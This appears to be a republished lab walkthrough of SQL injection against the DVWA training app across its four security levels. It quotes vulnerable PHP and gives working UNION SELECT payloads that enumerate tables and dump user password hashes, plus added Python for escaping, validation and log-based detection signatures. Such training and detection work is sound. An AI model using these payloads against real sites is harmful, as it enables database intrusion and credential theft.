"DVWA" "SQL Injection" SQL injection low Medium high impossible

Source: Internet
Author: User
Tags: mysql, client, php, source code

1. Low level: low.php

First look at the source code: the id parameter is taken from the request and placed directly into the SQL statement that is executed.

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&submit=Submit#

Appending a single quote directly produces a database error, and the error message makes it easy to see that the value is enclosed in single quotes that can be closed.

http://localhost/DVWA-master/vulnerabilities/sqli/?id=1'&Submit=Submit#

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

Use ORDER BY to determine the number of columns in the query.

http://localhost/DVWA-master/vulnerabilities/sqli/?id=1' ORDER BY 3%23&Submit=Submit#

With ORDER BY 2 the page displays normally, so the query returns two columns.

Use UNION SELECT to query user() and database().

http://localhost/DVWA-master/vulnerabilities/sqli/?id=1' union select user(),database()%23&Submit=Submit#

Query the table names.

http://localhost/DVWA-master/vulnerabilities/sqli/?id=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'%23&Submit=Submit#

Query the column names of the users table.

http://localhost/DVWA-master/vulnerabilities/sqli/?id=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'%23&Submit=Submit#

Query the data.

http://localhost/DVWA-master/vulnerabilities/sqli/?id=0' union select user,password from dvwa.users limit 0,1%23&Submit=Submit#

The password values retrieved can then be decrypted.

2. Medium level: medium.php

Looking at the difference: the id parameter is no longer taken from $_REQUEST, and mysqli_real_escape_string() is used to escape the special characters in the string before it is used in the SQL statement.

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

The most direct effect is that ' is escaped as \', so an attacker cannot close the quotes and therefore cannot inject that way.

If the MySQL client charset is GBK, a wide-byte injection becomes possible. See http://netsecurity.51cto.com/art/201404/435074.htm and https://www.cnblogs.com/superkrissV/p/8379690.html

Here, however, the id parameter is used as an integer. Since no closing quote is required, injection still works normally; the query where id is treated as an integer is:

SELECT first_name, last_name FROM users WHERE user_id = $id;

Use the HackBar plugin to submit the POST data; in the POST body, do not encode # as %23.

id=0 union select 1,2#&Submit=Submit

Extract the data in the same way as at the low level.

id=0 union select user,password from dvwa.users limit 0,1#&Submit=Submit
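To make the medium-level point concrete, here is an added example (not DVWA's or the original author's code) that re-creates in Python what mysqli_real_escape_string() does for a single-byte charset, shows why that escaping is useless when the value is spliced in unquoted, and shows the defender's fix: validating id as a plain integer before it reaches the query. The names escape_string, query_medium, validate_id and safe_query are this example's own.

```python
import re

# Python re-creation of what mysqli_real_escape_string() does for a single-byte
# connection charset (illustration only, not PHP's or DVWA's own code).
_ESCAPES = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
            "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}

def escape_string(value: str) -> str:
    """Backslash-escape the characters MySQL treats specially inside a quoted literal."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)

def query_with_quotes(raw_id: str) -> str:
    """Escaping works when the value sits inside quotes: the quote can no longer be closed."""
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{escape_string(raw_id)}';"

def query_medium(raw_id: str) -> str:
    """medium.php's shape: escaped, but spliced in as a bare integer with no quotes,
    so input containing no quote or control characters passes through unchanged."""
    return f"SELECT first_name, last_name FROM users WHERE user_id = {escape_string(raw_id)};"

def validate_id(raw_id: str):
    """Fix for the unquoted case: accept only a plain decimal integer (stricter than PHP's
    is_numeric(), which also accepts floats and exponents) and return it as int, else None.
    In real code the int should then be bound as a parameter, as impossible.php does."""
    return int(raw_id) if re.fullmatch(r"\d+", raw_id.strip()) else None

def safe_query(raw_id: str):
    """Assumed hardened handler: builds the query only from a validated integer, else None."""
    id_int = validate_id(raw_id)
    if id_int is None:
        return None
    return f"SELECT first_name, last_name FROM users WHERE user_id = {id_int};"
```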

3. High level: high.php

The id parameter is taken from the session. Because session data is stored on the server side, many programmers check data coming from the client but consider data already held on the server side to be safe.

if( isset( $_SESSION[ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

Clicking the link pops up a page with the following URL:

http://localhost/DVWA-master/vulnerabilities/sqli/session-input.php

Reviewing the source code

Looking at the source of session-input.php, the id parameter is stored into the session without any processing.

if( isset( $_POST[ 'id' ] ) ) {
    $_SESSION[ 'id' ] = $_POST[ 'id' ];
    //$page[ 'body' ] .= "Session ID set!<br /><br /><br />";
    $page[ 'body' ] .= "Session ID: {$_SESSION[ 'id' ]}<br /><br /><br />";
    $page[ 'body' ] .= "<script>window.opener.location.reload(true);</script>";
}

With this understood, injection is possible: the page that receives the injected value is session-input.php, and the page that displays the result is index.php.

http://localhost/DVWA-master/vulnerabilities/sqli/session-input.php

POST submission:

id=0' union select user,password from dvwa.users#&Submit=Submit

Then refresh:

http://localhost/DVWA-master/vulnerabilities/sqli/index.php

4. Impossible level: impossible.php

Viewing the source code, PDO prepared statements are used to prevent SQL injection, and id is checked to be numeric and bound as an integer.

$id = $_GET[ 'id' ];

// Was a number entered?
if( is_numeric( $id ) ) {
    // Check the database
    $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
    $data->bindParam( ':id', $id, PDO::PARAM_INT );
    $data->execute();
    $row = $data->fetch();
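From the defender's side, the requests in this walkthrough leave recognisable traces. The following is an added example (not DVWA's or the original author's code) that scans constructed Apache-style access log lines modelled on the low-level GET requests above and flags the ORDER BY probe, UNION SELECT, information_schema enumeration, comment truncation and any non-integer id. It also shows the caveat that matters for the medium and high levels: their id travels in a POST body, which an access log never records, so those requests can only be judged from application or WAF request-body logging. The log lines, SIGNATURES, analyse_request and scan_log are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Apache-style access log lines modelled on the walkthrough's GET requests.
# The medium and high levels send id in a POST body, which an access log never records.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1533
127.0.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /DVWA-master/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 1610
127.0.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET /DVWA-master/vulnerabilities/sqli/?id=1%27+ORDER+BY+3%23&Submit=Submit HTTP/1.1" 200 1612
127.0.0.1 - - [01/Jan/2024:10:00:04 +0000] "GET /DVWA-master/vulnerabilities/sqli/?id=0%27+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=%27dvwa%27%23&Submit=Submit HTTP/1.1" 200 1701
127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "POST /DVWA-master/vulnerabilities/sqli/ HTTP/1.1" 200 1540
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
VULN_PATH = "/DVWA-master/vulnerabilities/sqli/"   # path from the walkthrough's URLs
# Signatures for the techniques the walkthrough uses, applied to the URL-decoded id value.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "schema_enum": re.compile(r"information_schema", re.I),
    "comment_truncation": re.compile(r"(#|--\s|/\*)"),
}

def analyse_request(target: str) -> list[str]:
    """Return detection reasons for one request target (path plus query string)."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    reasons = []
    for value in params.get("id", []):
        decoded = unquote_plus(value)   # parse_qs decoded once; a second pass catches double encoding
        if not re.fullmatch(r"\s*\d+\s*", decoded):   # this endpoint only ever expects an integer id
            reasons.append("id_not_integer")
        reasons += [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return reasons

def scan_log(text: str) -> list[tuple[int, str, list[str]]]:
    """Scan access-log text and return (line number, method, reasons) for suspicious requests."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        method, target = m.group("method"), m.group("target")
        reasons = analyse_request(target) if method == "GET" else []
        if method == "POST" and urlsplit(target).path.startswith(VULN_PATH):
            reasons = ["post_body_not_logged"]   # needs application or WAF request-body logging
        if reasons:
            hits.append((n, method, reasons))
    return hits
```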

"DVWA" "SQL Injection" SQL injection low Medium high impossible

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.